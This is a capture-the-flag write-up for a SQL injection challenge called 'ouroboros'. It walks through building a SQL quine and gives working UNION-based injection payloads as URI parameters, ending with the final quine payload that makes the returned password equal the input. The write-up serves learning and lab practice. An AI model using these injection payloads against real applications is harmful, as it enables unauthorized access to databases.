Skip to main content

ouroboros

1

We are provided with the SQL query:

SELECT pw FROM prob_ouroboros WHERE pw='{$_GET[pw]}'

If $result['pw'] is equal $_GET['pw'], the challenge is solved.

If we provide the following URI parameter:

?pw=' UNION SELECT 1 -- -

The resultant query becomes:

SELECT pw FROM prob_ouroboros WHERE pw='' UNION SELECT 1 -- -'

3

In this case the $result['pw'] and $_GET['pw'] differ as follows:

$result['pw']: 1
$_GET['pw']: ' UNION SELECT 1 -- -

In order to make them the same, we have to use a Quine program.

 

Quine

A Quine is a program that outputs its own souce code without having access to it. An example of a SQL Quine is:

SELECT Replace(Replace(
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine',
char(34),char(39)),char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine')
AS Quine

Initial string

'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine'

First replacement

-- - SELECT Replace( -- -
Replace( 
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine', 
char(34), 
char(39)
)
-- - , char(36), 'SELECT REPLACE(REPLACE("$",char(34),char(39)),char(36),"$") AS Quine') AS Quine -- -

Replace all occurrences of char(34) (double quote " character) with char(39) (single quote ' character):

-- - SELECT Replace( -- -
'SELECT Replace(Replace(\'$\',char(34),char(39)),char(36),\'$\') AS Quine'
-- - , char(36), 'SELECT REPLACE(REPLACE("$",char(34),char(39)),char(36),"$") AS Quine') AS Quine -- -

Second replacement

-- - SELECT -- -
Replace(
'SELECT Replace(Replace('$',char(34),char(39)),char(36),'$') AS Quine', 
char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine'
)
-- - AS Quine -- -

Replace all occurrences of char(36) (dollar sign $ character) with the original string:

-- - SELECT -- -
'SELECT Replace(Replace(
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\',
char(34),char(39)),char(36),
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\')
AS Quine'
-- - AS Quine -- -

Putting it All Together

The final result of the query is the string after both replacements, as follows:

SELECT
'SELECT Replace(Replace(
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\',
char(34), char(39)), char(36),
\'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine\')
AS Quine'
AS Quine

When this SQL query is executed, it will produce a single column named Quine containing the following text:

SELECT Replace(Replace(
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine',
char(34), char(39)), char(36),
'SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") AS Quine')
AS Quine

Thus, we can see how the query repeats itself.

 

Modified Quine

' UNION SELECT Replace(Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),char( 39)),char(36), 
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')
%23

First replacement

-- - ' UNION SELECT Replace( -- -
Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),
char(39)
)
-- -,char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')%23 -- -

Replace all occurrences of char(34) (double quote " character) with char(39) (single quote ' character):

-- - ' UNION SELECT Replace( -- -
'\' UNION SELECT Replace(Replace(\'$\',char(34),char(39)),char(36),\'$\')%23'
-- -,char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')%23 -- -

Second replacement

-- - ' UNION SELECT -- -
Replace(
'\' UNION SELECT Replace(Replace('$',char(34),char(39)),char(36),'$')%23',
char(36),
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23')
-- - %23 -- -

Replace all occurrences of char(36) (dollar sign $ character) with the original string:

-- - ' UNION SELECT -- -
'\' UNION SELECT Replace(Replace(
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
,char(34),char(39)),char(36),
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
)%23'
-- - %23 -- -

Putting it all together

The final result of the query is the string after both replacements, as follows:

' UNION SELECT 
\'\' UNION SELECT Replace(Replace(
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
,char(34),char(39)),char(36),
\'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23\'
)%23'
%23

When this SQL query is executed, it will return the following text:

' UNION SELECT Replace(Replace(
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23',
char(34),char(39)),char(36),
'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$")%23'
)%23

We have successfully managed to create a Quine to solve this challenge.

 

Now, we have to implement this for the challenge. We will have to modify this Quine to the following:

UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char( 39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -

If we provide the following URI parameter:

?pw=' UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char( 39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -

The resultant query becomes:

SELECT pw FROM prob_ouroboros WHERE pw='' UNION SELECT Replace(Replace('" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -',char(34),char( 39)),char(36),'" UNION SELECT Replace(Replace("$",char(34),char(39)),char(36),"$") -- -') -- -'

4